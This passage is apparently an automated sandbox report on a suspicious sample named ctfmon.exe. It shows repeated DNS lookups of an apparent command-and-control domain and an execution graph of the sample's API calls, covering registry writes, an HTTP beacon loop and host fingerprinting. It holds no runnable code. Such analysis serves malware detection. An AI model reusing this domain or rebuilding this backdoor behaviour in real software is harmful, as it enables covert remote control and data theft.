      Dec 27, 2024 14:13:03.997077942 CET1.1.1.1192.168.2.60x1aedNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:03.997112036 CET1.1.1.1192.168.2.60x1aedNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:35.218943119 CET1.1.1.1192.168.2.60x26dcNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:13:35.218956947 CET1.1.1.1192.168.2.60x26dcNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:07.058629990 CET1.1.1.1192.168.2.60xd85eNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:07.058650970 CET1.1.1.1192.168.2.60xd85eNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:39.127676964 CET1.1.1.1192.168.2.60x1008No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:14:39.127697945 CET1.1.1.1192.168.2.60x1008No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:12.032366037 CET1.1.1.1192.168.2.60x305bNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:12.032439947 CET1.1.1.1192.168.2.60x305bNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:43.902530909 CET1.1.1.1192.168.2.60xb5adNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:15:43.902556896 CET1.1.1.1192.168.2.60xb5adNo error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:15.416356087 CET1.1.1.1192.168.2.60xfc38No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:15.416402102 CET1.1.1.1192.168.2.60xfc38No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:46.155421972 CET1.1.1.1192.168.2.60xe938No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false
      Dec 27, 2024 14:16:46.155436993 CET1.1.1.1192.168.2.60xe938No error (0)mircroupdata.dynamic-dns.net127.0.0.1A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:08:13:00
      Start date:27/12/2024
      Path:C:\Users\user\Desktop\ctfmon.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\ctfmon.exe"
      Imagebase:0x400000
      File size:252'928 bytes
      MD5 hash:E93FC4C159D07F6BFC246C10E6149EF8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:3
      Start time:08:13:16
      Start date:27/12/2024
      Path:C:\Users\user\Desktop\ctfmon.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\ctfmon.exe"
      Imagebase:0x400000
      File size:252'928 bytes
      MD5 hash:E93FC4C159D07F6BFC246C10E6149EF8
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Reset < >

        Execution Graph

        Execution Coverage:6.3%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:11.4%
        Total number of Nodes:2000
        Total number of Limit Nodes:43
        execution_graph 18661 401240 18678 42159f 18661->18678 18663 40125f GetSystemMenu 18696 424bd3 18663->18696 18666 4012d6 SendMessageW SendMessageW 18701 404620 GetCommandLineA 18666->18701 18671 4012c5 18736 424739 18671->18736 18672 40129f AppendMenuW AppendMenuW 18672->18671 18679 4215b1 18678->18679 18680 4215a9 18678->18680 18753 423aa1 18679->18753 18744 423af1 18680->18744 18683 4215af 18684 4215cc 18683->18684 18762 423830 18683->18762 18741 42147a 18684->18741 18688 4215d5 18688->18663 18689 4215d9 18766 4241a5 18689->18766 18692 4215ff 18692->18663 19345 424b61 18696->19345 18698 424bda 18699 424f58 30 API calls 18698->18699 18700 401271 18699->18700 18700->18666 18725 424ab5 18700->18725 19353 4248ad 18701->19353 18706 4047aa 18706->18706 18707 4047bb RegOpenKeyExA GetLastError 18706->18707 18708 4047f3 RegQueryValueExA 18707->18708 18709 4047e3 18707->18709 18710 404838 18708->18710 18711 40481b 18708->18711 18713 424739 ctype 32 API calls 18709->18713 18712 404873 RegSetValueExA 18710->18712 18715 404899 RegCloseKey 18710->18715 18711->18710 18714 404820 RegCloseKey 18711->18714 18712->18715 18716 401303 18713->18716 18714->18709 18715->18709 18717 424236 18716->18717 18718 424240 18717->18718 18720 401316 18717->18720 19421 4218e7 18718->19421 18721 424319 18720->18721 18722 424323 SetWindowPos 18721->18722 18724 40132c CreateThread 18721->18724 18722->18724 19451 4014b0 VirtualAlloc WSAStartup LoadLibraryW 18724->19451 19428 424b39 18725->19428 18728 424ae3 19432 424886 18728->19432 18730 424afb 18733 424b39 29 API calls 18730->18733 18734 424b21 18730->18734 19437 4249e6 18730->19437 18731 401294 18731->18671 18731->18672 18733->18730 18735 424a36 35 API calls 18734->18735 18735->18731 18737 424761 18736->18737 18738 424749 InterlockedDecrement 18736->18738 18737->18666 18738->18737 18739 424757 18738->18739 18740 424625 ctype 31 API calls 18739->18740 18740->18737 18742 421483 18741->18742 18743 42148c KiUserCallbackDispatcher 18741->18743 18742->18743 18743->18688 18745 423be9 18744->18745 18752 423b13 18744->18752 18747 423bff 18745->18747 18780 42317f GetTopWindow 18745->18780 18747->18683 18748 423b69 lstrlenA 18748->18752 18749 423b9c SendDlgItemMessageW 18749->18752 18750 423bc2 SendDlgItemMessageA 18750->18752 18751 423b80 MultiByteToWideChar 18751->18749 18752->18745 18752->18748 18752->18749 18752->18750 18752->18751 18754 423ae3 18753->18754 18755 423aae 18753->18755 18757 423af1 119 API calls 18754->18757 18756 4283ee ctype 28 API calls 18755->18756 18758 423ab3 FindResourceW 18756->18758 18760 423ad6 18757->18760 18758->18754 18759 423aca LoadResource 18758->18759 18759->18760 18761 423ada LockResource 18759->18761 18760->18683 18761->18754 18763 42383a __EH_prolog 18762->18763 19342 4281c1 18763->19342 18767 4215e5 18766->18767 18768 4241ac GetDlgItem 18766->18768 18767->18692 18770 421549 18767->18770 18769 421c35 58 API calls 18768->18769 18769->18767 18771 4283ee ctype 28 API calls 18770->18771 18772 421555 18771->18772 18773 405110 28 API calls 18772->18773 18776 42155c 18772->18776 18774 421565 18773->18774 18775 4283ee ctype 28 API calls 18774->18775 18774->18776 18775->18776 18777 424368 18776->18777 18778 42437e 18777->18778 18779 42436f ShowWindow 18777->18779 18778->18692 18779->18778 18781 42318f 18780->18781 18782 4231f6 18781->18782 18783 4231b9 SendMessageW 18781->18783 18785 4231eb GetWindow 18781->18785 18786 4231cf GetTopWindow 18781->18786 18788 42317f 111 API calls 18781->18788 18789 421c5c 18781->18789 18792 421a74 18781->18792 18782->18747 18783->18781 18785->18781 18786->18781 18786->18785 18788->18785 18802 421bc3 18789->18802 18791 421c63 ctype 18791->18781 18793 421a7e __EH_prolog 18792->18793 18794 428c05 ctype 21 API calls 18793->18794 18795 421a96 18794->18795 18796 421af3 18795->18796 19000 421901 GetWindowRect 18795->19000 19003 422931 18796->19003 18798 421b1c 18798->18781 18803 421bcd __EH_prolog 18802->18803 18810 428414 18803->18810 18805 421bd3 ctype 18808 421c11 ctype 18805->18808 18815 420e3f 18805->18815 18808->18791 18823 4283ee 18810->18823 18817 420e45 18815->18817 18818 420e63 18817->18818 18899 40e10c 18817->18899 18818->18808 18819 424ef3 18818->18819 18820 424efd __EH_prolog ctype 18819->18820 18958 41ff6a 18820->18958 18822 424f34 18822->18808 18824 428c05 ctype 21 API calls 18823->18824 18825 4283fd 18824->18825 18826 428413 18825->18826 18839 428c9a 18825->18839 18828 428c05 18826->18828 18829 428c3b TlsGetValue 18828->18829 18830 428c0e 18828->18830 18831 428c4e 18829->18831 18832 428c28 18830->18832 18862 428805 TlsAlloc 18830->18862 18836 428c61 18831->18836 18837 42842a 18831->18837 18866 42889e EnterCriticalSection 18832->18866 18835 428c39 18835->18829 18876 428a0d TlsGetValue 18836->18876 18837->18805 18841 428ca4 __EH_prolog 18839->18841 18840 428cd2 18840->18826 18841->18840 18845 428f39 18841->18845 18846 428f44 18845->18846 18847 428f49 18845->18847 18857 428ea6 18846->18857 18849 428cbb 18847->18849 18850 428f96 EnterCriticalSection 18847->18850 18851 428f6d EnterCriticalSection 18847->18851 18854 428fa9 18849->18854 18850->18849 18852 428f7b InitializeCriticalSection 18851->18852 18853 428f8e LeaveCriticalSection 18851->18853 18852->18853 18853->18850 18855 428fb2 LeaveCriticalSection 18854->18855 18856 428fc7 18854->18856 18855->18856 18856->18840 18858 428eb0 GetVersion 18857->18858 18861 428eca 18857->18861 18859 428ed2 InitializeCriticalSection 18858->18859 18860 428ec3 18858->18860 18859->18861 18860->18859 18860->18861 18861->18847 18863 428834 18862->18863 18864 428839 InitializeCriticalSection 18862->18864 18891 41fa5f 18863->18891 18864->18832 18867 4288bd 18866->18867 18869 4288f7 GlobalAlloc 18867->18869 18870 42890a GlobalHandle GlobalUnlock GlobalReAlloc 18867->18870 18875 428979 ctype 18867->18875 18868 42898e LeaveCriticalSection 18868->18835 18871 42892c 18869->18871 18870->18871 18872 428955 GlobalLock 18871->18872 18873 42893a GlobalHandle GlobalLock LeaveCriticalSection 18871->18873 18872->18875 18874 41fa5f ctype RaiseException 18873->18874 18874->18872 18875->18868 18877 428a3e 18876->18877 18881 428a24 18876->18881 18894 4287d3 LocalAlloc 18877->18894 18878 428ae4 18878->18837 18881->18878 18882 428a87 LocalAlloc 18881->18882 18883 428a98 LocalReAlloc 18881->18883 18886 428aa8 18882->18886 18883->18886 18888 428ab4 ctype 18886->18888 18889 41fa5f ctype RaiseException 18886->18889 18887 428a76 LeaveCriticalSection 18887->18881 18890 428ad3 TlsSetValue 18888->18890 18889->18888 18890->18878 18893 40e5b5 RaiseException 18891->18893 18895 4287e6 18894->18895 18896 4287eb EnterCriticalSection 18894->18896 18897 41fa5f ctype RaiseException 18895->18897 18898 42877a 18896->18898 18897->18896 18898->18887 18902 40e11e 18899->18902 18903 40e11b 18902->18903 18905 40e125 ctype 18902->18905 18903->18817 18905->18903 18906 40e14a 18905->18906 18907 40e177 18906->18907 18910 40e1ba 18906->18910 18913 40e1a5 18907->18913 18924 41257d 18907->18924 18909 40e229 RtlAllocateHeap 18920 40e1ac 18909->18920 18910->18913 18914 40e1dc 18910->18914 18911 40e18d 18939 4130e0 18911->18939 18913->18909 18913->18920 18916 41257d ctype 28 API calls 18914->18916 18918 40e1e3 18916->18918 18948 413b83 18918->18948 18920->18905 18921 40e1f6 18955 40e210 18921->18955 18925 4125d3 EnterCriticalSection 18924->18925 18926 412595 18924->18926 18925->18911 18927 40e10c ctype 27 API calls 18926->18927 18928 41259d 18927->18928 18929 4125ab 18928->18929 18930 40d130 ctype 7 API calls 18928->18930 18931 41257d ctype 27 API calls 18929->18931 18930->18929 18932 4125b3 18931->18932 18933 4125c4 18932->18933 18934 4125ba InitializeCriticalSection 18932->18934 18935 40df0d ctype 27 API calls 18933->18935 18936 4125c9 18934->18936 18935->18936 18937 4125de ctype LeaveCriticalSection 18936->18937 18938 4125d1 18937->18938 18938->18925 18942 413112 18939->18942 18940 41349a ctype VirtualAlloc 18941 40e198 18940->18941 18945 40e1b1 18941->18945 18942->18941 18943 4133e9 ctype HeapReAlloc HeapAlloc VirtualAlloc HeapFree 18942->18943 18944 4131b1 18942->18944 18943->18944 18944->18940 18944->18941 18946 4125de ctype LeaveCriticalSection 18945->18946 18947 40e1b8 18946->18947 18947->18913 18949 413b91 ctype 18948->18949 18950 413d52 18949->18950 18953 413c7d VirtualAlloc 18949->18953 18954 413c4e ctype 18949->18954 18951 41388b ctype 5 API calls 18950->18951 18951->18954 18953->18954 18954->18921 18956 4125de ctype LeaveCriticalSection 18955->18956 18957 40e203 18956->18957 18957->18913 18957->18920 18959 41ff7b 18958->18959 18960 41ff75 18958->18960 18962 41ff97 ctype 18959->18962 18963 420e3f ctype 29 API calls 18959->18963 18964 420e68 18960->18964 18962->18822 18963->18962 18967 40df0d 18964->18967 18968 40dfe7 18967->18968 18969 40df3b 18967->18969 18968->18959 18970 40df80 18969->18970 18971 40df45 18969->18971 18972 40df71 18970->18972 18975 41257d ctype 28 API calls 18970->18975 18973 41257d ctype 28 API calls 18971->18973 18972->18968 18974 40dfd9 HeapFree 18972->18974 18977 40df4c ctype 18973->18977 18974->18968 18980 40df8c ctype 18975->18980 18976 40df66 18990 40df77 18976->18990 18977->18976 18984 412db7 18977->18984 18983 40dfb8 18980->18983 18993 413b3e 18980->18993 18997 40dfcf 18983->18997 18986 412df5 18984->18986 18989 4130ab ctype 18984->18989 18985 412ff1 VirtualFree 18987 413055 18985->18987 18986->18985 18986->18989 18988 413064 VirtualFree HeapFree 18987->18988 18987->18989 18988->18989 18989->18976 18991 4125de ctype LeaveCriticalSection 18990->18991 18992 40df7e 18991->18992 18992->18972 18994 413b81 18993->18994 18995 413b6b 18993->18995 18994->18983 18995->18994 18996 413a25 ctype VirtualFree HeapFree VirtualFree 18995->18996 18996->18994 18998 4125de ctype LeaveCriticalSection 18997->18998 18999 40dfd6 18998->18999 18999->18972 19022 424202 19000->19022 19002 42191a 19002->18796 19025 421b9c 19003->19025 19030 422975 19003->19030 19004 422953 19005 421b04 19004->19005 19098 422460 19004->19098 19005->18798 19009 421924 19005->19009 19010 421931 19009->19010 19011 421998 19009->19011 19012 424202 GetWindowLongW 19010->19012 19011->18798 19013 42193b 19012->19013 19013->19011 19014 421942 GetWindowRect 19013->19014 19014->19011 19015 421959 19014->19015 19015->19011 19016 421961 GetWindow 19015->19016 19017 421c35 58 API calls 19016->19017 19018 421972 19017->19018 19019 42438f IsWindowEnabled 19018->19019 19020 42197d 19018->19020 19019->19020 19020->19011 19272 4238e8 19020->19272 19023 424215 19022->19023 19024 424209 GetWindowLongW 19022->19024 19024->19002 19026 428c05 ctype 21 API calls 19025->19026 19027 421bae 19026->19027 19029 422460 2 API calls 19027->19029 19028 421bc1 19028->19004 19029->19028 19031 42297f __EH_prolog 19030->19031 19032 422996 19031->19032 19033 4229ae 19031->19033 19103 422f12 19032->19103 19111 422f14 19032->19111 19034 4229f3 19033->19034 19035 4229e3 19033->19035 19088 4229a1 19033->19088 19037 422a10 19034->19037 19038 4229f8 19034->19038 19119 421c35 19035->19119 19043 428f39 ctype 6 API calls 19037->19043 19135 4219fe 19038->19135 19044 422a31 19043->19044 19045 422a4f 19044->19045 19053 422a76 19044->19053 19047 428fa9 ctype LeaveCriticalSection 19045->19047 19046 422af3 19048 428fa9 ctype LeaveCriticalSection 19046->19048 19054 422a5c 19047->19054 19048->19088 19049 422b11 19052 428fa9 ctype LeaveCriticalSection 19049->19052 19050 422b3f 19055 422d06 19050->19055 19056 422d4c 19050->19056 19057 422ccd 19050->19057 19058 422b50 19050->19058 19059 422dd4 19050->19059 19060 422cdb 19050->19060 19061 422c62 19050->19061 19062 422b66 19050->19062 19063 422d26 19050->19063 19064 422ce5 19050->19064 19065 422caf 19050->19065 19066 422d34 19050->19066 19067 422c39 19050->19067 19068 422cf9 19050->19068 19069 422d3d 19050->19069 19070 422b7d 19050->19070 19050->19088 19090 422b8b 19050->19090 19091 422bf8 19050->19091 19051 422b2d GetVersion 19051->19050 19052->19054 19053->19046 19053->19049 19053->19059 19054->19050 19054->19051 19054->19088 19086 421c35 58 API calls 19055->19086 19087 421c35 58 API calls 19056->19087 19056->19088 19073 42613f 57 API calls 19057->19073 19149 42613f 19058->19149 19072 428fa9 ctype LeaveCriticalSection 19059->19072 19075 424bd3 57 API calls 19060->19075 19083 424bd3 57 API calls 19061->19083 19076 421c35 58 API calls 19062->19076 19079 421c35 58 API calls 19063->19079 19077 424bd3 57 API calls 19064->19077 19071 421c35 58 API calls 19065->19071 19080 421c35 58 API calls 19066->19080 19082 421c35 58 API calls 19067->19082 19085 421c35 58 API calls 19068->19085 19081 421c35 58 API calls 19069->19081 19078 421c35 58 API calls 19070->19078 19084 422cb7 19071->19084 19072->19088 19073->19088 19075->19088 19076->19088 19077->19088 19078->19088 19079->19088 19080->19088 19081->19088 19082->19088 19083->19088 19089 421c35 58 API calls 19084->19089 19085->19088 19086->19088 19087->19088 19088->19004 19089->19088 19092 421c5c 57 API calls 19090->19092 19158 4261bc 19091->19158 19094 422bb7 ctype 19092->19094 19154 422256 19094->19154 19099 42248f CallWindowProcW 19098->19099 19100 42246d 19098->19100 19101 4224a2 19099->19101 19100->19099 19102 42247b DefWindowProcW 19100->19102 19101->19005 19102->19101 19104 422f14 19103->19104 19105 422f32 19104->19105 19106 428c05 ctype 21 API calls 19104->19106 19107 422f65 19105->19107 19163 420f4c 19105->19163 19108 422f7b 19106->19108 19107->19088 19108->19107 19171 423296 19108->19171 19112 422f6c 19111->19112 19116 422f32 19111->19116 19113 428c05 ctype 21 API calls 19112->19113 19115 422f7b 19113->19115 19114 422f65 19114->19088 19115->19114 19117 423296 59 API calls 19115->19117 19116->19114 19118 420f4c 59 API calls 19116->19118 19117->19116 19118->19114 19120 421bc3 ctype 57 API calls 19119->19120 19121 421c3e 19120->19121 19195 424f58 19121->19195 19123 421c4b 19201 42443b 19123->19201 19125 421c55 19126 42199d 19125->19126 19127 424202 GetWindowLongW 19126->19127 19128 4219af 19127->19128 19129 4219f7 19128->19129 19215 42309d 19128->19215 19129->19034 19131 4219bd 19132 42309d 62 API calls 19131->19132 19133 4219c9 19132->19133 19133->19129 19134 4219e2 SendMessageW 19133->19134 19134->19129 19136 421a08 19135->19136 19137 421a6d 19135->19137 19136->19137 19138 42309d 62 API calls 19136->19138 19137->19037 19137->19088 19139 421a2b 19138->19139 19139->19137 19140 421a2f GetLastActivePopup 19139->19140 19141 421c35 58 API calls 19140->19141 19142 421a3e 19141->19142 19142->19137 19143 421a44 GetForegroundWindow 19142->19143 19144 421c35 58 API calls 19143->19144 19145 421a50 19144->19145 19145->19137 19236 42438f 19145->19236 19147 421a5b 19147->19137 19148 421a5f SetForegroundWindow 19147->19148 19148->19137 19239 4260cd 19149->19239 19151 426146 19152 424f58 30 API calls 19151->19152 19153 426151 19152->19153 19153->19088 19155 422260 __EH_prolog 19154->19155 19156 42229c ctype 19155->19156 19247 422413 19155->19247 19156->19091 19160 4261c6 __EH_prolog 19158->19160 19159 4261e6 19159->19088 19160->19159 19266 42618b 19160->19266 19183 420abe 19163->19183 19165 420f67 19166 420f81 GetParent 19165->19166 19170 420fac 19165->19170 19167 421c35 58 API calls 19166->19167 19168 420f90 19167->19168 19168->19170 19187 4203c0 19168->19187 19170->19107 19172 4232a0 __EH_prolog 19171->19172 19173 421bc3 ctype 57 API calls 19172->19173 19175 4232ac ctype 19173->19175 19174 423318 19174->19105 19175->19174 19176 4232c2 GetParent 19175->19176 19177 423320 19175->19177 19179 4232d1 ctype 19176->19179 19178 423269 21 API calls 19177->19178 19178->19174 19179->19174 19192 423269 19179->19192 19182 422256 ctype 58 API calls 19182->19174 19184 420ace 19183->19184 19186 420ad3 19183->19186 19185 4283ee ctype 28 API calls 19184->19185 19185->19186 19186->19165 19188 428414 ctype 28 API calls 19187->19188 19189 4203c5 19188->19189 19190 4203d1 19189->19190 19191 4283ee ctype 28 API calls 19189->19191 19190->19170 19191->19190 19193 428c05 ctype 21 API calls 19192->19193 19194 42327b 19193->19194 19194->19182 19196 424f62 __EH_prolog ctype 19195->19196 19197 424fd7 19196->19197 19199 41fa5f ctype RaiseException 19196->19199 19200 424f73 ctype 19196->19200 19205 4200ce 19197->19205 19199->19197 19200->19123 19202 424442 19201->19202 19204 42445e ctype 19201->19204 19203 424448 GetParent 19202->19203 19202->19204 19203->19204 19204->19125 19208 4200e2 19205->19208 19206 4200fe 19206->19200 19207 4200f7 19211 420003 19207->19211 19208->19206 19208->19207 19209 41ff6a ctype 29 API calls 19208->19209 19209->19207 19212 42001a 19211->19212 19213 42000c 19211->19213 19212->19206 19214 41fef1 ctype 29 API calls 19213->19214 19214->19212 19216 4230a8 19215->19216 19218 4230a1 19215->19218 19216->19131 19218->19216 19219 4230bd 19218->19219 19222 423058 19218->19222 19220 421c35 58 API calls 19219->19220 19221 4230c3 19220->19221 19221->19131 19223 421c5c 57 API calls 19222->19223 19224 423063 19223->19224 19225 423077 GetWindowLongW 19224->19225 19226 423067 19224->19226 19228 423090 GetWindow 19225->19228 19229 423087 GetParent 19225->19229 19231 405c99 19226->19231 19230 42306e 19228->19230 19229->19230 19230->19218 19232 405ca0 GetParent 19231->19232 19233 405ca9 19231->19233 19232->19233 19234 421c35 58 API calls 19233->19234 19235 405caf 19234->19235 19235->19230 19237 4243a0 19236->19237 19238 424396 IsWindowEnabled 19236->19238 19238->19147 19240 4260d7 __EH_prolog 19239->19240 19241 428414 ctype 28 API calls 19240->19241 19242 4260dd ctype 19241->19242 19243 420e3f ctype 29 API calls 19242->19243 19245 42611b ctype 19242->19245 19244 4260ff 19243->19244 19244->19245 19246 424ef3 ctype 29 API calls 19244->19246 19245->19151 19246->19245 19248 422420 19247->19248 19249 42241c 19247->19249 19250 421bc3 ctype 57 API calls 19248->19250 19249->19156 19251 422429 ctype 19250->19251 19252 422448 19251->19252 19253 42243d KiUserCallbackDispatcher 19251->19253 19254 42245a 19252->19254 19256 421cb3 19252->19256 19253->19252 19254->19156 19257 421cd4 19256->19257 19258 421cbe 19256->19258 19257->19254 19259 421bc3 ctype 57 API calls 19258->19259 19260 421cc5 19259->19260 19260->19257 19262 42011e 19260->19262 19263 420154 19262->19263 19264 420127 19262->19264 19263->19257 19264->19263 19265 420050 ctype 29 API calls 19264->19265 19265->19263 19267 426196 19266->19267 19268 4261ac DeleteDC 19266->19268 19269 4260cd ctype 57 API calls 19267->19269 19268->19159 19270 42619d 19269->19270 19270->19268 19271 42011e ctype 29 API calls 19270->19271 19271->19268 19273 424202 GetWindowLongW 19272->19273 19274 4238fb 19273->19274 19275 423905 19274->19275 19277 423910 GetParent 19274->19277 19278 42391b GetWindow 19274->19278 19276 423942 GetWindowRect 19275->19276 19279 4239e6 GetParent GetClientRect GetClientRect MapWindowPoints 19276->19279 19280 42395b 19276->19280 19281 423926 19277->19281 19278->19281 19292 423a13 19279->19292 19282 42396f 19280->19282 19283 42395f GetWindowLongW 19280->19283 19281->19276 19284 42392c SendMessageW 19281->19284 19285 423983 19282->19285 19286 4239bd GetWindowRect 19282->19286 19283->19282 19284->19276 19287 423940 19284->19287 19302 405110 19285->19302 19288 405b9b 14 API calls 19286->19288 19287->19276 19290 4239d0 19288->19290 19293 405c06 12 API calls 19290->19293 19297 424319 SetWindowPos 19292->19297 19295 4239d6 CopyRect 19293->19295 19295->19292 19299 423a96 19297->19299 19299->19011 19303 4203c0 28 API calls 19302->19303 19304 405115 19303->19304 19305 405b9b 19304->19305 19325 405a6d 19305->19325 19308 405bb8 19310 405bc5 IsIconic 19308->19310 19314 405bbe 19308->19314 19309 405baa MonitorFromWindow 19309->19314 19311 405be1 GetWindowRect 19310->19311 19312 405bd2 GetWindowPlacement 19310->19312 19313 405bee 19311->19313 19312->19313 19313->19314 19334 405b45 19313->19334 19316 405c06 19314->19316 19317 405a6d 7 API calls 19316->19317 19318 405c13 19317->19318 19319 405c25 19318->19319 19320 405c17 GetMonitorInfoW 19318->19320 19321 405c8d CopyRect CopyRect 19319->19321 19322 405c3c SystemParametersInfoW 19319->19322 19320->19321 19321->19292 19322->19321 19323 405c4e GetSystemMetrics GetSystemMetrics 19322->19323 19323->19321 19324 405c7e lstrcpyW 19323->19324 19324->19321 19326 405a8a GetModuleHandleW 19325->19326 19327 405a7a 19325->19327 19326->19327 19328 405a9b GetProcAddress 19326->19328 19327->19308 19327->19309 19328->19327 19329 405ab2 GetProcAddress 19328->19329 19329->19327 19330 405ac3 GetProcAddress 19329->19330 19330->19327 19331 405ad4 GetProcAddress 19330->19331 19331->19327 19332 405ae5 GetProcAddress 19331->19332 19332->19327 19333 405af6 GetProcAddress 19332->19333 19333->19327 19335 405a6d 7 API calls 19334->19335 19336 405b4c 19335->19336 19337 405b60 19336->19337 19338 405b50 MonitorFromRect 19336->19338 19339 405b8d 19337->19339 19340 405b77 GetSystemMetrics 19337->19340 19338->19339 19339->19314 19340->19339 19341 405b84 GetSystemMetrics 19340->19341 19341->19339 19343 428c05 ctype 21 API calls 19342->19343 19344 4215c8 19343->19344 19344->18684 19344->18689 19346 424b6b __EH_prolog 19345->19346 19347 428414 ctype 28 API calls 19346->19347 19348 424b71 ctype 19347->19348 19349 420e3f ctype 29 API calls 19348->19349 19351 424baf ctype 19348->19351 19350 424b93 19349->19350 19350->19351 19352 424ef3 ctype 29 API calls 19350->19352 19351->18698 19352->19351 19354 4248c5 19353->19354 19355 4248ba lstrlenA 19353->19355 19365 424710 19354->19365 19355->19354 19359 4248d9 19376 424a36 19359->19376 19362 41f9b6 19363 4246df 34 API calls 19362->19363 19364 4046a5 WideCharToMultiByte 19363->19364 19364->18706 19366 424720 19365->19366 19367 424734 19366->19367 19381 42466d 19366->19381 19371 424a80 19367->19371 19372 424a94 MultiByteToWideChar 19371->19372 19373 424a8c 19371->19373 19375 424aad 19372->19375 19373->19372 19374 424a90 19373->19374 19374->19359 19375->19359 19415 4246df 19376->19415 19378 424a3e 19379 424a47 lstrlenW 19378->19379 19380 40469a 19378->19380 19379->19380 19380->19362 19382 424695 19381->19382 19383 42467d InterlockedDecrement 19381->19383 19386 4245a1 19382->19386 19383->19382 19384 42468b 19383->19384 19393 424625 19384->19393 19387 4245ad 19386->19387 19389 4245b6 19386->19389 19387->19367 19388 4245be 19404 40cc20 19388->19404 19389->19388 19391 4245fd 19389->19391 19392 420e3f ctype 29 API calls 19391->19392 19392->19387 19394 424639 19393->19394 19395 42462d 19393->19395 19394->19395 19398 424666 19394->19398 19401 40ccaf 19395->19401 19399 420e68 ctype 29 API calls 19398->19399 19400 42466b 19399->19400 19400->19382 19402 40ccd6 19401->19402 19403 40ccbb EnterCriticalSection LeaveCriticalSection 19401->19403 19402->19382 19403->19402 19411 40dec0 19404->19411 19406 40cc2a EnterCriticalSection 19407 40cc48 19406->19407 19408 40cc79 LeaveCriticalSection 19406->19408 19412 41fef1 19407->19412 19408->19387 19411->19406 19413 420e3f ctype 29 API calls 19412->19413 19414 40cc5a 19413->19414 19414->19408 19416 4246eb 19415->19416 19420 4246fa ctype 19415->19420 19417 42466d ctype 32 API calls 19416->19417 19418 4246f0 19417->19418 19419 4245a1 ctype 31 API calls 19418->19419 19419->19420 19420->19378 19424 42187e GetWindowLongW 19421->19424 19425 42189b 19424->19425 19426 42189f SetWindowLongW 19424->19426 19425->18720 19426->19425 19427 4218b5 SetWindowPos 19426->19427 19427->19425 19429 4283ee ctype 28 API calls 19428->19429 19430 424b3f LoadStringW 19429->19430 19431 424ad8 19430->19431 19431->18728 19431->18730 19433 424892 19432->19433 19434 424896 lstrlenW 19432->19434 19443 424803 19433->19443 19434->19433 19436 4248a6 19436->18731 19438 4249f9 19437->19438 19439 424a2e 19438->19439 19440 4245a1 ctype 31 API calls 19438->19440 19439->18730 19441 424a10 ctype 19440->19441 19446 42469e 19441->19446 19444 424710 ctype 34 API calls 19443->19444 19445 424812 ctype 19444->19445 19445->19436 19447 4246ab InterlockedDecrement 19446->19447 19448 4246bd 19446->19448 19447->19448 19449 4246b6 19447->19449 19448->19439 19450 424625 ctype 31 API calls 19449->19450 19450->19448 19452 401551 19451->19452 19453 401539 GetProcAddress FreeLibrary 19451->19453 19454 401559 19452->19454 19455 401c07 14 API calls 19452->19455 19453->19452 19456 401d0a 19455->19456 19479 405040 GetCommandLineW 19456->19479 19463 401da1 InternetOpenA 19464 401dd0 InternetConnectA 19463->19464 19465 401dc3 Sleep 19463->19465 19466 401dfe HttpOpenRequestA 19464->19466 19467 401dee InternetCloseHandle Sleep 19464->19467 19465->19463 19468 401e25 InternetCloseHandle InternetCloseHandle Sleep 19466->19468 19469 401e3b InternetSetOptionA 19466->19469 19467->19463 19468->19463 19470 401e4e Sleep WaitForSingleObject ResetEvent 19469->19470 19525 40d60e 19470->19525 19473 401ee9 HttpAddRequestHeadersA HttpSendRequestA 19474 401f2c InternetReadFile 19473->19474 19475 401f5e GetLastError 19474->19475 19478 401f4f 19474->19478 19476 401f64 SetEvent 19475->19476 19476->19470 19476->19478 19478->19470 19478->19474 19478->19476 19530 401ff0 19478->19530 19480 424886 ctype 35 API calls 19479->19480 19481 405078 19480->19481 19482 41f9b6 34 API calls 19481->19482 19483 405083 19482->19483 19631 40d7c2 19483->19631 19486 4050a1 19634 40da67 19486->19634 19489 4050ab 19490 420e3f ctype 29 API calls 19489->19490 19491 4050b3 19490->19491 19652 40dc44 19491->19652 19496 424739 ctype 32 API calls 19497 401d0f 19496->19497 19498 403190 19497->19498 19499 401d19 19498->19499 19500 4031ab GetComputerNameW 19498->19500 19520 403d20 GetLogicalDrives 19499->19520 19501 403230 19500->19501 19502 403238 gethostname gethostbyname 19500->19502 19501->19502 19503 403277 19502->19503 19504 4032df timeGetTime 19502->19504 19505 40d60e 48 API calls 19503->19505 19506 40d60e 48 API calls 19504->19506 19507 4032be 19505->19507 19508 403351 19506->19508 20068 403550 